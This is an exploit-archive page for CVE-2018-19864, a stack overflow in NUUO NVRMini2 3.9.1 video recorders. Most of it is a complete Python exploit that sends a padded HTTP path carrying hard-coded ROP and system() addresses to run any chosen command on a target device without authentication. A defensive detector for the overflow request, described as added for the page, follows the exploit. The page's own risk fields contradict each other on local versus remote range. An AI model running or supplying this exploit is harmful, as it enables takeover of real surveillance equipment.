NUUO NVRMini 2 3.9.1 Stack Overflow

2019.06.05
Credit: 0x00string
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/usr/bin/python
# Exploit Title: NUUO NVRMini2 3.9.1 'sscanf' stack overflow
# Google Dork: n/a
# Date: Advisory Published: Nov 18
# Exploit Author: @0x00string
# Vendor Homepage: nuuo.com
# Software Link: https://www.nuuo.com/ProductNode.php?node=2
# Version: 3.9.1 and prior
# Tested on: 3.9.1
# CVE : CVE-2018-19864
#
# Layout of the request path that overruns the stack buffer:
# [ leading / ]
# [ Padding x 335 ]
# [ original value at stack pointer + 158 ]
# [ padding x 80 ]
# [ address of (pop {r3,lr} ; bx lr) ]
# [ system() address ]
# [ address of (mov r0,sp ; blx r3) ]
# [ command to execute ]

import getopt
import sys
from socket import socket, AF_INET, SOCK_STREAM


def banner():
    # 0x00string logo; whitespace layout approximated from the original
    print '''
@0x00string
            0000000000000
         0000000000000000000
     00   00000000000000000000000000000
      0000000000000000000000000000000
     000000000               0000000000
    00000000                  0000000000
   0000000                   000000000000
   0000000                 000000000000000
  000000                     000000000
  000000     0000000         000000000
  000000     000000          000000000
  000000     000000          000000000
  000000     000000           00000000
  000000     000000          000000000
  000000     0000000         000000000
   0000000   000000          000000000
   000000    0000000000000000
   0000000    0000000000000
    0000000    00000000000
     00000000  00000000000
      000000000 0000000000000000000000000000000
       00000000000000000000000000000   000
         0000000000000000000
            0000000000000

https://github.com/0x00string/oldays/blob/master/CVE-2018-19864.py
'''


def usage():
    print ("python script.py <args>\n"
           "    -h, --help:     Show this message\n"
           "    -a, --rhost:    Target IP address\n"
           "    -b, --rport:    Target Port - default 5150\n"
           "    -c, --command:  Command to execute\n"
           "\n"
           "Example:\n"
           "python script.py -a 10.10.10.10\n"
           "python script.py -a 10.10.10.10 -b 1234 -c reboot\n")
    exit()


def main():
    rhost = None
    rport = "5150"
    command = "{/bin/touch,/tmp/hax}"
    banner()
    options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:fh',
                                       ['rhost=', 'rport=', 'command=', 'help'])
    for opt, arg in options:
        if opt in ('-h', '--help'):
            usage()
        elif opt in ('-a', '--rhost'):
            rhost = arg
        elif opt in ('-b', '--rport'):
            rport = arg
        elif opt in ('-c', '--command'):
            command = arg
    if rhost is None:
        # the target address is mandatory
        usage()
    print ("Sending exploit to execute [" + command + "]\n")
    # request path built to the layout described in the header comment
    buf = ("GET /" + ("Z" * 335) + "\x30\x2a\x17\x45" + ("Y" * 80)
           + "\x08\xfc\x78\x40" + "\x44\xe0\x17\x40" + "\xcc\xb7\x77\x40"
           + command + " HTTP/1.1\r\nHost: " + "http://" + rhost + ":" + rport
           + "\r\n\r\n")
    sock = socket(AF_INET, SOCK_STREAM)
    sock.settimeout(30)
    # connect to the host and port given on the command line
    sock.connect((rhost, int(rport)))
    sock.send(buf)
    print ("done\n")


if __name__ == "__main__":
    main()
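The request that triggers this overflow has a shape that is easy to pick out on the wire: a request-target several hundred bytes long, made mostly of one repeated filler byte, followed by raw non-URI bytes (the stack addresses) and a command string. The following detection routine is an added example written for this page from a defender's perspective; it is not code from the advisory or from NUUO. It parses the HTTP request line and reports the three traits above. The length threshold, the 32-byte filler-run cutoff and the sample requests are all constructed assumptions for illustration (a real NVRMini2 request log would be used in practice).

```python
import re

# Assumed threshold: the overflow path seen on this device is well over 300 bytes,
# so a limit in the low hundreds separates it from normal NVR web traffic.
MAX_URI_LEN = 256

# Bytes allowed in a request-target per RFC 3986 (reserved + unreserved + '%').
URI_SAFE = re.compile(br"^[A-Za-z0-9\-._~:/?#\[\]@!$&'()*+,;=%]*$")

# A run of 32 or more identical bytes is a strong hint of overflow padding.
FILLER_RUN = re.compile(br"(.)\1{31,}", re.DOTALL)


def parse_request_line(raw):
    """Split the first line of a raw HTTP request into (method, target, version).

    Returns None when the line does not have at least three space-separated
    fields. Extra fields (a target containing spaces) are folded back into the
    target so that the URI check below can flag them rather than dropping them.
    """
    line, _, _ = raw.partition(b"\r\n")
    parts = line.split(b" ")
    if len(parts) < 3:
        return None
    method = parts[0]
    version = parts[-1]
    target = b" ".join(parts[1:-1])
    return method, target, version


def inspect_request(raw, max_uri_len=MAX_URI_LEN):
    """Return a list of reasons a request looks like the overflow pattern.

    An empty list means nothing suspicious was found in the request line.
    """
    reasons = []
    parsed = parse_request_line(raw)
    if parsed is None:
        return ["malformed request line"]
    method, target, version = parsed
    if len(target) > max_uri_len:
        reasons.append("request-target length %d exceeds %d"
                       % (len(target), max_uri_len))
    if not URI_SAFE.match(target):
        reasons.append("request-target contains bytes outside the URI character set")
    if FILLER_RUN.search(target):
        reasons.append("request-target contains a run of 32+ identical bytes (filler)")
    return reasons


# Constructed sample requests (not captured traffic): a normal page fetch and one
# shaped like the overflow request, with arbitrary high bytes standing in for
# the addresses and a short trailing string standing in for the command.
SAMPLE_REQUESTS = [
    b"GET /index.html HTTP/1.1\r\nHost: 192.0.2.10:5150\r\n\r\n",
    b"GET /" + b"Z" * 400 + b"\xff\xfe\x80\x01" + b"id"
    + b" HTTP/1.1\r\nHost: 192.0.2.10:5150\r\n\r\n",
]


def scan(requests):
    """Map each request index to its list of reasons, for a quick triage view."""
    return {i: inspect_request(r) for i, r in enumerate(requests)}


if __name__ == "__main__":
    for idx, reasons in sorted(scan(SAMPLE_REQUESTS).items()):
        status = "ALERT" if reasons else "ok"
        print("request %d: %s %s" % (idx, status, "; ".join(reasons)))
```

Each check is independent, so a request that only trips the length limit (a long but well-formed query string) is reported with a single reason and can be whitelisted without losing the non-URI-byte and filler-run signals that distinguish the overflow request.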


Copyright 2019, cxsecurity.com
